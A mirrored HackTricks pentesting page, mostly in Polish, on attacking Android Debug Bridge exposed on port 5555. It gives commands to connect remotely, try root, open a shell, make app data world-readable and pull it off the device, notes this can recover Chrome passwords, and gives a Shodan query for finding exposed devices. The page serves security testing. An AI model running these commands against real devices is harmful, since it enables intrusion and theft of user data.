Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/5555-android-debug-bridge.md

3.7 KiB
Raw Blame History

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Podstawowe informacje

Z dokumentacji:

Android Debug Bridge (adb) to wszechstronne narzędzie wiersza poleceń, które pozwala na komunikację z urządzeniem. Polecenie adb ułatwia różnorodne działania na urządzeniu, takie jak instalowanie i debugowanie aplikacji, a także zapewnia dostęp do powłoki Unix, której można używać do uruchamiania różnych poleceń na urządzeniu.

Domyślny port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Jeśli znajdziesz usługę ADB działającą na porcie urządzenia i możesz się z nią połączyć, możesz uzyskać powłokę wewnątrz systemu:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Aby pobrać dane aplikacji w całości, możesz:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Możesz użyć tego triku, aby odzyskać wrażliwe informacje, takie jak hasła do chrome. Aby uzyskać więcej informacji na ten temat, sprawdź informacje w podanych odniesieniach tutaj.

Shodan

  • android debug bridge

{% hint style="success" %} Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks
{% endhint %}